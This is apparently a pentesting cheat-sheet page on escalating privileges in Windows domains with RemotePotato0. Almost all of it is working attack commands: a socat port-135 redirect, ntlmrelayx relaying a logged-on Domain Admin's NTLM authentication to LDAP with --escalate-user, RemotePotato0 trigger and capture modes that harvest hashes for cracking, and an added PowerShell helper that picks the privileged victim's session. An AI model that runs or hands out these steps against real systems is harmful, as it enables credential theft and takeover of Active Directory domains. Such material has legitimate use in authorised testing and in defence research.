
Windows PrivEsc with RemotePotato

Last modified: 2023-11-11

Exploit

Reference: RemotePotato0

According to the RemotePotato0 README, the exploit abuses the DCOM activation service to trigger an NTLM authentication from any user currently logged on to the target machine, then relays it to another resource (LDAP on a domain controller via ntlmrelayx, for instance). It requires that a privileged user (e.g. a Domain Admin) is logged on to the same machine, so check the interactive sessions first; the session ID of that user is what the -s option expects.

We can download the executable from https://github.com/antonioCoco/RemotePotato0.

Module 0 (-m 0: Rpc2Http cross protocol relay server + potato trigger)

# In attack machine
# The target's DCOM client contacts the rogue OXID resolver on TCP/135, which RPCSS already owns on Windows,
# so redirect port 135 on the attack box back to RemotePotato0's listener (-p 9999) on the target
sudo socat tcp-listen:135,fork,reuseaddr tcp:<target-ip>:9999 &
# Receive the relayed (HTTP) NTLM authentication and forward it to LDAP on the DC;
# --escalate-user grants the low-privileged account elevated rights via ACL attacks
sudo ntlmrelayx.py -t ldap://<target-dc-ip> --no-wcf-server --escalate-user normal_user

# In target machine (as the low-privileged user; <attack-ip> must be reachable from the target)
# -m 0: Module (Rpc2Http cross protocol relay server + potato trigger)
# -r: Remote HTTP relay server (the host running ntlmrelayx)
# -x: Rogue Oxid resolver ip (the host whose port 135 is redirected to the -p listener)
# -p: Rogue Oxid resolver port (local listener that the socat redirect points at)
# -s: Session id for the Cross Session Activation Attack (the privileged user's session from `query user`)
.\RemotePotato0.exe -m 0 -r <attack-ip> -x <attack-ip> -p 9999 -s 1

Module 1 (-m 1: Rpc2Http cross protocol relay server)

# Relay server only, no potato trigger: something else has to authenticate to the listener
# -l: RPC Relay server listening port
.\RemotePotato0.exe -m 1 -l 9997 -r <attack-ip>

# Send an NTLM authentication as the current user to the relay server (useful to verify the relay chain)
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 (-m 2: Rpc capture server + potato trigger)

# Capture mode: the privileged user's NTLM challenge/response is captured for offline cracking instead of relayed
# Find the session id of the privileged user for -s
query user
# -x must still be reachable on TCP/135 from the target; redirect it to the -p listener as in module 0 if needed
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1
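Modules 0 and 2 both need the -s value of the privileged user's session, and picking it by hand from `query user` output is error-prone (the current user's row is prefixed with '>', and disconnected sessions have an empty SESSIONNAME column). The helper below is an added example, not part of RemotePotato0; the function name, the parameter names and the sample `query user` lines are constructed for illustration, and the list of privileged accounts is assumed to be known to the operator.

```powershell
# Added helper (not part of RemotePotato0): choose the session ID to pass as -s.
# Assumes the operator supplies the privileged account names (e.g. Domain Admins).
function Get-PotatoSessionId {
    param(
        [Parameter(Mandatory)][string[]]$QueryUserOutput,   # lines as printed by `query user`
        [Parameter(Mandatory)][string[]]$PrivilegedUsers    # e.g. @('da_admin')
    )
    # query user columns: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
    # SESSIONNAME is blank for disconnected sessions and the current user's row
    # starts with '>', so match by position instead of splitting on whitespace.
    $pattern = '^\s*(?<me>[>]?)(?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)'
    $candidates = foreach ($line in $QueryUserOutput) {
        $m = [regex]::Match($line, $pattern)
        if (-not $m.Success) { continue }          # header line and blanks fall through here
        [pscustomobject]@{
            User      = $m.Groups['user'].Value
            Id        = [int]$m.Groups['id'].Value
            State     = $m.Groups['state'].Value
            IsCurrent = $m.Groups['me'].Value -eq '>'
        }
    }
    # Skip our own session (relaying our own token gains nothing) and prefer
    # Active sessions over disconnected ones; -contains is case-insensitive.
    $hit = $candidates |
        Where-Object { -not $_.IsCurrent -and ($PrivilegedUsers -contains $_.User) } |
        Sort-Object { $_.State -ne 'Active' } |
        Select-Object -First 1
    if (-not $hit) { throw 'No privileged user is logged on; RemotePotato0 has nothing to relay.' }
    return $hit
}

# Constructed sample of `query user` output so the helper can be exercised offline.
$sample = @(
    ' USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME',
    '>lowpriv               console             1  Active      none   11/11/2023 9:00 AM',
    ' svc_backup                                3  Disc           42   11/11/2023 8:30 AM',
    ' da_admin              rdp-tcp#3           2  Active          5   11/11/2023 9:10 AM'
)
$target = Get-PotatoSessionId -QueryUserOutput $sample -PrivilegedUsers @('da_admin', 'svc_backup')
# On a live target replace $sample with the real output: (query user)
"Session $($target.Id) ($($target.User), $($target.State)) -> .\RemotePotato0.exe -m 0 -r <attack-ip> -x <attack-ip> -p 9999 -s $($target.Id)"
```

With the sample above the helper returns session 2 (da_admin, Active) rather than the disconnected svc_backup session 3, and it refuses to return the caller's own session 1. A disconnected session is still a valid target, since the user is still logged on; it is only ranked after Active ones.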

Module 3 (-m 3: Rpc capture server)

# Capture server only, no potato trigger
.\RemotePotato0.exe -m 3 -l 9997

# Send an NTLM authentication as the current user to the capture server (test run; yields only the current user's response)
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm